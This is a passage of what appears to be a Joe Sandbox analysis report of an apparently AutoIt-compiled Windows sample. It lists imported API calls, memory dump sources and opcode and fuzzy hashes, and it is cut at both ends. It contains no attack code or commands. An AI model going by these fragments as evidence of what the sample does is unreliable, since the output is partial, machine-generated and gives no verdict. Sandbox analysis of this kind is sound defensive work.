                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                              • String ID: <$@
                                                                                              • API String ID: 146682121-1426351568
                                                                                              • Opcode ID: 155a0ae7c0646861381600da6de16ce92eb0dec3c229fe3c4cfd9e4b17f4ae2e
                                                                                              • Instruction ID: 0521b08f37dbe1162a4360bbb03b14948783d35255ade8badbc4385bb9183c7a
                                                                                              • Opcode Fuzzy Hash: 155a0ae7c0646861381600da6de16ce92eb0dec3c229fe3c4cfd9e4b17f4ae2e
                                                                                              • Instruction Fuzzy Hash: EF714871A00619EFCB14DF94C894AAEBBF4BF48314F04C499E85AAB392C774ED45CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00A57206
                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A5723C
                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 00A5724D
                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A572CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                              • String ID: DllGetClassObject
                                                                                              • API String ID: 753597075-1075368562
                                                                                              • Opcode ID: 4ffe212610b07d4206682afb1e898b4164445acf9f3938eb164120eafb60a2a4
                                                                                              • Instruction ID: 1ee2444927219ab776d8d910a96730dd122d26735850ef58388f50e91e6af225
                                                                                              • Opcode Fuzzy Hash: 4ffe212610b07d4206682afb1e898b4164445acf9f3938eb164120eafb60a2a4
                                                                                              • Instruction Fuzzy Hash: 20414E71A04204EFDB15CF94D884ADE7BB9FF44711F2480A9BD09AF20AD7B1D949CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A82F8D
                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00A82F94
                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A82FA9
                                                                                              • DestroyWindow.USER32 ref: 00A82FB1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                              • String ID: SysAnimate32
                                                                                              • API String ID: 3529120543-1011021900
                                                                                              • Opcode ID: afe4bf061f5c8d77beed6a8fae8b69c536a8d39f9a4c2b1e069df55d083ef303
                                                                                              • Instruction ID: da115ebc78b0805cdd59f159d46f393cca4de3374ff351c6d321b5107ae494fe
                                                                                              • Opcode Fuzzy Hash: afe4bf061f5c8d77beed6a8fae8b69c536a8d39f9a4c2b1e069df55d083ef303
                                                                                              • Instruction Fuzzy Hash: 09216A71204209ABEB10AFA4DC84FBB77B9EF99364F104628FA50D6190D771DC61DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A14D1E,00A228E9,?,00A14CBE,00A228E9,00AB88B8,0000000C,00A14E15,00A228E9,00000002), ref: 00A14D8D
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00A14D1E,00A228E9,?,00A14CBE,00A228E9,00AB88B8,0000000C,00A14E15,00A228E9,00000002), ref: 00A14DA0
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00A14D1E,00A228E9,?,00A14CBE,00A228E9,00AB88B8,0000000C,00A14E15,00A228E9,00000002,00000000), ref: 00A14DC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 2134e7879c629775e2c565f62c322524a370ea04efef3b88c1eab6a3345ab0ea
                                                                                              • Instruction ID: efba0ee5c67b6429d72ccdd6b0bc2bfee5d90db2007cc8fce4a3659ad902e53c
                                                                                              • Opcode Fuzzy Hash: 2134e7879c629775e2c565f62c322524a370ea04efef3b88c1eab6a3345ab0ea
                                                                                              • Instruction Fuzzy Hash: 98F03C35A40218BBDB119BD4EC49BEEBBE5EF48762F0001A8B905A2260CB745985DFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32 ref: 00A4D3AD
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A4D3BF
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A4D3E5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                                                              • API String ID: 145871493-2590602151
                                                                                              • Opcode ID: b5d08b750864d389698e7d5bfa7b3f055efbdea4a0b5ae846f5b2ce754fa7e08
                                                                                              • Instruction ID: 96ce96e58b4a7ef77a52ba866df6d971b1a448495eb3a45c07b10b3710d4643a
                                                                                              • Opcode Fuzzy Hash: b5d08b750864d389698e7d5bfa7b3f055efbdea4a0b5ae846f5b2ce754fa7e08
                                                                                              • Instruction Fuzzy Hash: 9AF0553A906620ABD7306B108C98AAD7324AF91F01B908288F802F9145DBB0CD418BA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4E9C
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,009F4EDD,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EAE
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,009F4EDD,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-3689287502
                                                                                              • Opcode ID: 93b511b02db688dc018ca2db7d35fe541910c2df4cd89a9c6af4d187734793de
                                                                                              • Instruction ID: b046bf6cb63db8add0f9cf2408b31efd6d92754a7ab163bfa09f96baa989a104
                                                                                              • Opcode Fuzzy Hash: 93b511b02db688dc018ca2db7d35fe541910c2df4cd89a9c6af4d187734793de
                                                                                              • Instruction Fuzzy Hash: 5EE08C36A02A226BD3326B65BC5CB6B665CBF81F72B050215FE00E2201DB74CD068BB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4E62
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00A33CDE,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4E74
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00A33CDE,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4E87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-1355242751
                                                                                              • Opcode ID: 1234bb9695936eb949bdee653b89e60436e403d57f72a96c5b75260dad16267d
                                                                                              • Instruction ID: d5c969c19838074245211d0930faf3ee9a4c9a15d5e8cbb797e234db96b92b15
                                                                                              • Opcode Fuzzy Hash: 1234bb9695936eb949bdee653b89e60436e403d57f72a96c5b75260dad16267d
                                                                                              • Instruction Fuzzy Hash: 97D0C232502A2167CB322B247C0CE9B2A1CBF81F313050710BA01A2110CF34CD168BF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00A7A427
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A7A435
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A7A468
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A7A63D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3488606520-0
                                                                                              • Opcode ID: 8eecac44c3a00d0c17be3fc2a52dc0204b144c10826ebc9a722cae12876fc828
                                                                                              • Instruction ID: 947374b65c78292622b1bbe079d9a8b1d4e62a5e7bffeed6b1bbaf4b5aeb5174
                                                                                              • Opcode Fuzzy Hash: 8eecac44c3a00d0c17be3fc2a52dc0204b144c10826ebc9a722cae12876fc828
                                                                                              • Instruction Fuzzy Hash: 57A1B071604301AFD720DF24D886F2AB7E5AF94714F14C81DFA9A9B2D2D7B1EC418B92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A93700), ref: 00A2BB91
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00AC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A2BC09
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00AC1270,000000FF,?,0000003F,00000000,?), ref: 00A2BC36
                                                                                              • _free.LIBCMT ref: 00A2BB7F
                                                                                                • Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
                                                                                                • Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0
                                                                                              • _free.LIBCMT ref: 00A2BD4B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                              • String ID:
                                                                                              • API String ID: 1286116820-0
                                                                                              • Opcode ID: c28a0e7b294cf99d490e7fd903824182d07a14176eba61b04e6fca6d36669102
                                                                                              • Instruction ID: ec16a0f3dbd74cee00ca4e7a208538fda56322aa71839c9f2721d763599a55c2
                                                                                              • Opcode Fuzzy Hash: c28a0e7b294cf99d490e7fd903824182d07a14176eba61b04e6fca6d36669102
                                                                                              • Instruction Fuzzy Hash: 0C51E975910229AFCB10EFADAD81DEEB7BCEF45320B11427AE554D71A2EB309D418B70
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A5CF22,?), ref: 00A5DDFD
                                                                                                • Part of subcall function 00A5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A5CF22,?), ref: 00A5DE16
                                                                                                • Part of subcall function 00A5E199: GetFileAttributesW.KERNEL32(?,00A5CF95), ref: 00A5E19A
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00A5E473
                                                                                              • MoveFileW.KERNEL32 ref: 00A5E4AC
                                                                                              • _wcslen.LIBCMT ref: 00A5E5EB
                                                                                              • _wcslen.LIBCMT ref: 00A5E603
                                                                                              • SHFileOperationW.SHELL32 ref: 00A5E650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3183298772-0
                                                                                              • Opcode ID: 703fe2e888f60376a4cd4080ea8600a0d1cbce827d05a2b0293558d6bad35045
                                                                                              • Instruction ID: e4c8ba3b791ff177f81033b70afa8a3b240cf105cdaf2ac8566610332942fd56
                                                                                              • Opcode Fuzzy Hash: 703fe2e888f60376a4cd4080ea8600a0d1cbce827d05a2b0293558d6bad35045
                                                                                              • Instruction Fuzzy Hash: 205174B24083455BC728EB90D881ADB73ECAF94351F00491EFA89D3151EF75A68CC766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                                • Part of subcall function 00A7C998: CharUpperBuffW.USER32(?,?), ref: 00A7C9B5
                                                                                                • Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7C9F1
                                                                                                • Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA68
                                                                                                • Part of subcall function 00A7C998: _wcslen.LIBCMT ref: 00A7CA9E
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7BAA5
                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00A7BB00
                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A7BB63
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A7BBA6
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A7BBB3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                              • String ID:
                                                                                              • API String ID: 826366716-0
                                                                                              • Opcode ID: 66dbca403357ec2512c3e8160623ddca72f8f67882f90df2d9df01d95cf3d5da
                                                                                              • Instruction ID: 154b89d0526feeb5ad86234ee09d5dc078f651638c0ea1228239a11d07809819
                                                                                              • Opcode Fuzzy Hash: 66dbca403357ec2512c3e8160623ddca72f8f67882f90df2d9df01d95cf3d5da
                                                                                              • Instruction Fuzzy Hash: AC616871218205AFC314DF14C890F2ABBE5BF84348F14C96CF4998B2A2DB31ED45CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A58BCD
                                                                                              • VariantClear.OLEAUT32 ref: 00A58C3E
                                                                                              • VariantClear.OLEAUT32 ref: 00A58C9D
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A58D10
                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A58D3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                                              • String ID:
                                                                                              • API String ID: 4136290138-0
                                                                                              • Opcode ID: 6a1698217ad6a9f875e089f27e6bdb3d5f4762ac0cda1d75a2d18ac09d24dbab
                                                                                              • Instruction ID: 1dc6aa99acaf09a4f0711a0d34238ee75200840f4fda139d34a5a5024234b728
                                                                                              • Opcode Fuzzy Hash: 6a1698217ad6a9f875e089f27e6bdb3d5f4762ac0cda1d75a2d18ac09d24dbab
                                                                                              • Instruction Fuzzy Hash: BA5159B5A00219EFCB14CF68C894AAAB7F9FF89311B158559ED05EB350E734E911CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetPrivateProfileSectionW.KERNEL32 ref: 00A68BAE
                                                                                              • GetPrivateProfileSectionW.KERNEL32 ref: 00A68BDA
                                                                                              • WritePrivateProfileSectionW.KERNEL32 ref: 00A68C32
                                                                                              • WritePrivateProfileStringW.KERNEL32 ref: 00A68C57
                                                                                              • WritePrivateProfileStringW.KERNEL32 ref: 00A68C5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                              • String ID:
                                                                                              • API String ID: 2832842796-0
                                                                                              • Opcode ID: c441810930a6e71ae67ba1a6bf6c3bca3a557491a17fc4e02bdbbb4bf011aa36
                                                                                              • Instruction ID: 2d1acd3747875bb1f10103ca7737d992c2e7544cc9f3b0fb495b34996730746e
                                                                                              • Opcode Fuzzy Hash: c441810930a6e71ae67ba1a6bf6c3bca3a557491a17fc4e02bdbbb4bf011aa36
                                                                                              • Instruction Fuzzy Hash: A4513A35A002199FCB15DF64C881E6DBBF5FF48314F088458E949AB3A2DB39ED55CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A78F40
                                                                                              • GetProcAddress.KERNEL32(00000000,?,00000000,?), ref: 00A78FD0
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000,00000000,?), ref: 00A78FEC
                                                                                              • GetProcAddress.KERNEL32(00000000,?,00000041), ref: 00A79032
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A79052
                                                                                                • Part of subcall function 00A0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A61043,?,759D3F18), ref: 00A0F6E6
                                                                                                • Part of subcall function 00A0F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A4FA64,00000000,00000000,?,?,00A61043,?,759D3F18,?,00A4FA64), ref: 00A0F70D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                              • String ID:
                                                                                              • API String ID: 666041331-0
                                                                                              • Opcode ID: 1545b65b1eee395074825472ce13e439b9a02dd36fe9e33eb67bafa7970e0190
                                                                                              • Instruction ID: ab7c1290f11c9cfa6ea02d3ac250192f3835dd9f8dba1f813d7598852c9a182c
                                                                                              • Opcode Fuzzy Hash: 1545b65b1eee395074825472ce13e439b9a02dd36fe9e33eb67bafa7970e0190
                                                                                              • Instruction Fuzzy Hash: DD513934600209DFCB11DF58C8949ADBBB1FF49324B04C0A9E90A9B762DB35ED86CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowLongW.USER32 ref: 00A86C33
                                                                                              • SetWindowLongW.USER32 ref: 00A86C4A
                                                                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A86C73
                                                                                              • ShowWindow.USER32(00000002,00000000), ref: 00A86C98
